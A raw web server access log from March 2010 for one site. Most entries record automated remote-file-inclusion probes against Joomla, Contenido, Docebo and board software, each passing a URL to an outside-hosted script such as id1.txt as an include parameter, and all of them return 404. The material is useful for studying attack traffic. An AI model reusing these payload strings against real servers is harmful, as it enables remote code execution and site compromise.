87.250.255.243 - - [11/Mar/2010:04:00:55 -0800] "GET /logs/access_100227.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:04:02:25 -0800] "GET /logs/access_100224.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:04:02:44 -0800] "GET /logs/access_100225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:45 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:45 -0800] "GET /logs/access.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:45 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:50 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:50 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:02:50 -0800] "GET /logs/access.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
188.93.10.36 - - [11/Mar/2010:04:04:26 -0800] "GET /logs/access.log//errors.php?error=http://reseti.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:13:44 -0800] "GET /logs/access_091228.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:04:14:08 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:04:14:08 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:04:14:08 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:04:14:30 -0800] "GET /logs/access_100224.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:14:45 -0800] "GET /logs/access_100121.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
190.152.217.250 - - [11/Mar/2010:04:14:49 -0800] "GET /logs/access_100225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:15:05 -0800] "GET /logs/access_091228.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:15:39 -0800] "GET /logs//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:15:39 -0800] "GET /docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:15:39 -0800] "GET /logs/access_091228.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:15:49 -0800] "GET /logs/access_100121.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:16:20 -0800] "GET /logs/access_100121.log%20%20//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:18:42 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:18:57 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:18:57 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:18:57 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
115.68.52.19 - - [11/Mar/2010:04:19:31 -0800] "GET /logs/access.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:22:25 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:22:25 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:22:25 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:04:23:06 -0800] "GET /logs/access_100121.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:24:37 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:24:37 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:24:37 -0800] "GET /logs/access.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:24:47 -0800] "GET /logs/access_100121.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:24:47 -0800] "GET /logs/access_100121.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://myslowice.activh.pl//news//inc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
67.16.94.2 - - [11/Mar/2010:04:26:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.hellionindustries.com"
67.16.94.2 - - [11/Mar/2010:04:26:10 -0800] "GET / HTTP/1.0" 200 763 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:26:23 -0800] "GET /logs/access_100224.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:27:30 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:27:30 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:27:30 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:30:19 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:30:20 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:32:40 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:32:40 -0800] "GET /logs/access.log//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:32:40 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
213.175.197.86 - - [11/Mar/2010:04:34:09 -0800] "GET /logs/access_100224.log//bbs/delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:05 -0800] "GET /logs/access.log///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:05 -0800] "GET /logs///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:05 -0800] "GET //zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:43 -0800] "GET /logs///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:43 -0800] "GET /logs/access.log///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:35:43 -0800] "GET //zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
201.28.110.99 - - [11/Mar/2010:04:37:48 -0800] "GET //include/bbs.lib.inc.php?site_path=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
201.28.110.99 - - [11/Mar/2010:04:38:01 -0800] "GET /logs///include/bbs.lib.inc.php?site_path=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
201.28.110.99 - - [11/Mar/2010:04:38:01 -0800] "GET /logs/access_100224.log%20%20///include/bbs.lib.inc.php?site_path=http://horsetalkforums.co.uk/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
85.214.108.69 - - [11/Mar/2010:04:38:24 -0800] "GET /logs/access_100121.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:32 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:33 -0800] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:34 -0800] "GET /?M=A HTTP/1.1" 200 779 "-" "BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:35 -0800] "GET /?S=A HTTP/1.1" 200 779 "-" "BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 ips-agent" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:36 -0800] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:38 -0800] "GET /logs/ HTTP/1.1" 200 1653 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:39 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:40 -0800] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:41 -0800] "GET /?M=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
69.58.178.29 - - [11/Mar/2010:04:38:42 -0800] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3; ips-agent) Gecko/20090824 Fedora/1.0.7-1.1.fc4 Firefox/3.5.3" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:42:41 -0800] "GET /logs///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:42:41 -0800] "GET /logs/access_100121.log///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:42:41 -0800] "GET //zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:43:02 -0800] "GET //zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:43:02 -0800] "GET /logs/access_100121.log///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
195.95.229.230 - - [11/Mar/2010:04:43:02 -0800] "GET /logs///zboard//skin/happycast_category_lightblack/login.php?dir=http://selamed.110mb.com/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:48:39 -0800] "GET /logs/access_100121.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:48:47 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:48:47 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:48:47 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:04:52:04 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:04:52:04 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
72.55.143.249 - - [11/Mar/2010:04:52:04 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:04:52:14 -0800] "GET /logs/access_100225.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:53:37 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:04:56:13 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:04:56:13 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
69.163.187.6 - - [11/Mar/2010:04:56:13 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosconfig_absolute_path=http://www.boothbayoperahouse.com/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:57:22 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:57:22 -0800] "GET /logs/access.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
78.110.50.114 - - [11/Mar/2010:04:57:22 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:58:31 -0800] "GET /logs/access.log///requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:58:31 -0800] "GET /logs///requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:58:31 -0800] "GET //requests/playing.php//common/db.php?commonpath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:59:58 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.fileden.com/files/2010/1/12/2722069//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:59:58 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.fileden.com/files/2010/1/12/2722069//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
222.237.78.176 - - [11/Mar/2010:04:59:58 -0800] "GET /logs/access.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.fileden.com/files/2010/1/12/2722069//id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:00:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:00:08 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
61.47.7.71 - - [11/Mar/2010:05:00:08 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sumanenter.com/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:05:00:58 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:05:00:58 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
125.243.195.66 - - [11/Mar/2010:05:01:00 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.moterostrailmadrid.es//modules/gallery/gif/error/bid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.hellionindustries.com"
